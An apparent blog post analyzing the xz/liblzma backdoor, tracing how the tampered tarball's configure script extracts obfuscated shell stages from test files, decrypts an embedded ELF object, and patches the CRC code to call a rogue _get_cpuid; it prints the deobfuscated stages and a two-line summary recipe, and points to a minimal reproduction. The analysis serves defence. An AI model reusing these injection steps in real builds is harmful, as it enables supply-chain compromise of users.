Simplifying the xz backdoor

10 min read Original article ↗

I’m not a security expert, however I’m an expert at simplifying.

Throughout my career I’ve simplified many things others thought impossible, and I’ve done so by following a simple strategy few engage in: never surrender.

My past successes gave me the confidence to give a try to simplify one aspect of the xz backdoor: the installation of the hooks, but oh boy was I unprepared. One thing is to simplify code people did at least trying to not over-complicate things, an entirely different thing is to simplify something the authors clearly did not intend for anyone to understand.

It turns out even that one thing is just way too complex. However, I did not give up, lowered my expectations, and was able to simplify at least the beginning of the backdoor.

This should be helpful for people like me who are trying to figure out ways to prevent something like this from happening in the future.

For the impatient the result is xz-min, if you follow the instructions it should be easy to reproduce the backdoor.

We’ll start slow to be extra careful, but if you trust me you can just check the initial patch and skip the first section.

Cleanroom

As I explained in my previous post, the catalyst that enabled the backdoor is in the distributed tarball, not in the git repository. Therefore to find all the malicious changes we need to generate a tarball ourselves, but as I explained in my post, that generates a lot of benign differences. Even though my Arch Linux system has the same versions of autoconf and automake that they used, there’s still a lot of delta in the resulting tarball.

First of all, to generate the tarball I had to install po4a, doxygen, and ghostscript. Now, you might be thinking that there is no point in checking the documentation, but the xz project distributes PDFs. Couldn’t a malicious actor add some binary blob to a PDF and extract it in the building process? I don’t know, but I want to be absolutely certain there’s nothing there.

The PDFs were generated with ghostscript 9.55.0 and groff 1.22.4, so I installed that. Additionally, the API documentation was generated with doxygen 1.9.7, so I installed that as well. This way I was able to verify the documentation doesn’t contain anything malicious. I had to manually check the 14 distributed PDFs and there’s no extra binary blobs.

I do have to say, why distribute PDFs in the first place? These are generated for the man pages, but nobody is ever going to open lzmainfo-letter.pdf ever. Oh, there’s two PDFs for every man page, one for a4 and another for letter. Of course make install doesn’t install them, because nobody cares about them.

Worse than that, you don’t need ghostscript to generate a man page, because man can do it by itself: man -Tpdf lzmainfo.1 >lzmainfo.pdf. Wait, if man can do it why are the developers of xz putting PDFs in their tarballs? Don’t ask me. But what about US Letter paper?! MANROFFOPT=-P-pletter man -Tpdf lzmainfo.

xz developers really seem to like to overcomplicate stuff.

With PDFs out of the way, the other difference is config.guess and config.sub, which don’t seem to have anything noteworthy, but still. These files are generated by automake, but if I’m using the same version (1.16.5) why are they different? Well, GNU developers like to overcomplicate stuff as well, so these files come from the config project, and each distribution deals with them differently. Arch Linux just leaves whatever is in the automake tarball, Debian has a separate autotools-dev package, and Fedora uses redhat-rpm-config.

Based on the above we can guess the malicious developers used an RPM-based distribution, because the precise combination of config.guess=2022-01-09 and config.sub=2021-12-25 doesn’t match either what is in the automake 1.16.5 release or autotools-dev 20220109.1. I checked a few Fedora packages and there doesn’t to be any match, but in OpenMandriva 5.0, there’s an exact match, according to RPMfind.

Using those versions the diff is almost there, except that for some reason am__DIST_COMMON in Makefile.in is missing a file. According to this thread in the automake mailing list from 2001, running automake twice makes it generate the correct Makefile.in. Don’t try to understand autotools’ voodoo logic.

This gives use the final diff.

Why go into all this trouble? I’m a completionist, I don’t want to do this step ever again, and now I’m 100% sure that the tarball xz-5.6.1.tar.xz with SHA-1 checksum a77dd4689db35cfaa814d1c3a919720bd41f5623 does not contain any other modification from the code in git, other than the diff above.

In discussions online I heard the argument that it’s easy to check the tarball, all packagers need to do is install the same version of “autotools”. Hopefully after reading this section it should be clear that if you actually try to do this, it’s not that easy.

Focus on the ball

I see a lot of analyses focused on build-to-host.m4, but that script is not run in the build process. They probably are focused on that because the diff is easier to spot, and they don’t know how autotools work.

The script that is actually run is configure, those are the modifications we should focus on.

For example, this popular analysis: xz/liblzma: Bash-stage Obfuscation Explained by Gynvael Coldwind explains many things, but not where gl_am_configmake came from in “stage 0”.

Because this hack is so complex it’s easy to miss things, but we are not going to do that here because we are going to focus on what this thing actually does with the advantage of knowing how autotools is supposed to work.

If you look at the hacked configure script, you see that gl_am_configmake is saved to a file $CONFIG_STATUS, which is config.status. If we open that file we see:

gl_am_configmake='./tests/files/bad-3-corrupt_lzma2.xz'

That’s much less obfuscated than the original:

gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`

But it’s only available to you if you know how autoconf works, which most people don’t. Not really.

It’s right there at the beginning of the autoconf manual, where configure scripts are explained: “a shell script called config.status that, when run, recreates the files listed above”. So configure generates config.status, and then runs it, and that’s where the build system is actually modified.

The grep command might look daunting, but all it’s doing is looking for a file that contains a string with 4 #, then 5 alphanumeric characters, then 4 #, for example:

grep -r "####Hello####"
grep: tests/files/bad-3-corrupt_lzma2.xz: binary file matches

That’s not that hard is it?

Well, if you are looking at a script that is 25,752 lines of obfuscated shell script with no idea of what it’s trying to do on a good day and no reference to the benign version, I guess it would be hard. Fortunately that’s not what we are going to do here.

This is the true step 0.

Step 1

Based on the previous step, can you guess what the hack is going to do?

You guessed correctly: it’s going to try to do something with bad-3-corrupt_lzma2.xz, and fortunately for us all the relevant stuff is right there next to it in the config.status script:

gl_path_map='tr "\t \-_" " \t_\-"'
gl_localedir_prefix='xz'
gl_am_configmake='./tests/files/bad-3-corrupt_lzma2.xz'
localedir_c_make='\"$(localedir)\"'
gl_localedir_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null'

That’s going to be a little tricky to analyze… but we don’t have to, we can just echo that whole thing:

echo "sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null"
sed "r\n" ./tests/files/bad-3-corrupt_lzma2.xz | eval tr "\t \-_" " \t_\-" | xz -d 2>/dev/null

But again, no need to actually understand what it does, all we need to know is that xz -d decompresses the input, so whatever it’s receiving is a valid xz stream, and it turns out the output is yet another shell script that simplified does:

xz -dc tests/files/good-large_compressed.lzma | \
stuff | \
xz -F raw --lzma1 -dc | \
/bin/sh

Now this is where it gets tricky, because that script is quite complex. But we can just run it and see what it does, except it doesn’t do anything, so we do need to take a peek.

Deep within that script there’s an interesting check:

test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64"

This is testing if we are building a deb package or an rpm package, but we can just cheat with export RPM_ARCH=x86_64. We try again and bingo! Now two files are modified: libtool and src/liblzma/Makefile.

This is the diff. With that step 1 is done. So now we know what bad-3-corrupt_lzma2.xz was for.

Step 1b

Once again we don’t need to understand the changes, all we need to know is that src/liblzma/Makefile is modified. If we go to that directory and type make, a file called .libs/liblzma.so.5 is generated, and that’s really the target.

If we check for the hexdump provided in the original report:

hexdump -ve '1/1 "%.2x"' .libs/liblzma.so.5 | \
	grep -q 'f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410'
test $? = 0 && echo hacked

The library is compromised. So something in the Makefile is in fact introducing the backdoor.

If we check the changes in the Makefile, there’s this:

am__test = bad-3-corrupt_lzma2.xz

Wait, I thought we were done with bad-3-corrupt_lzma2.xz, what’s going on?

If we indent the main script contained inside, it’s easier to see that in fact that script has two modes, one is when config.status is in the current directory, and the other is when .libs/liblzma_la-crc64_fast.o is present. So one mode is for the top level directory, the other is for when we are inside src/liblzma.

It does make sense to reuse bad-3-corrupt_lzma2.xz, because after all it would be tricky to introduce yet another test file with a hack.

Unfortunately that second mode is much more complex, and there’s not much we can do to simplify it. The result of my best attempt at the first part is decrypt_rc4.sh, which although much more readable, it’s still very complex. X user nugxperience recognized the awk code is in fact an RC4 decrypter.

If we pass another test file, good-large_compressed.lzma as input, the output is the ELF binary object of the backdoor, which in the build process is saved as src/liblzma/liblzma_la-crc64-fast.o.

But how is that binary used? We are almost there.

Step 1c

After saving the ELF binary object, the same script tries to compile both crc64_fast.c and crc32_fast.c, but doing some modifications on the fly with sed. Additionally adds liblzma_la-crc64-fast.o to the object file of crc64_fast.c, which will contain both.

We don’t need to deal with any of that though, all we need is the result: code.diff.

From that code patch we can see that it’s changing is_arch_extension_supported() to _is_arch_extension_supported(), and there it’s calling an external _get_cpuid while the original was calling __get_cpuid. That later one is standard.

The ELF binary object with the backdoor implements the spurious _get_cpuid and that’s where everything starts.

We’ve finally reached the beginning of the backdoor. That’s where the true complexity begins.

Summary

After the deobfuscation the injection is not that complex:

  1. Extract the binary object from a test file.
  2. Patch the code to call _get_cpuid from the binary object.
decrypt_rc4.sh tests/files/good-large_compressed.lzma > src/liblzma/liblzma_la-crc64-fast.o
patch -p1 < code.diff

That’s it.

In xz-min I simplify the backdoor even more, because it’s just using liblzma as a trampoline.

In both crc64_fast.c and crc32_fast.c there’s an ifunc resolver defined (crc64_resolve and crc32_resolve respectively), and it’s those resolvers that activate the backdoor by calling _get_cpuid.

But any resolvers would do, the whole liblzma is not needed. So I created a mock liblzma and the backdoor is still successfully triggered.

And of course the fun is not just building liblzma with the backdoor, but actually using it. That’s easy to do with xz-min and xzbot with a few tricks that aren’t relevant for this article.

Trying to simplify _get_cpuid will be step 2.

References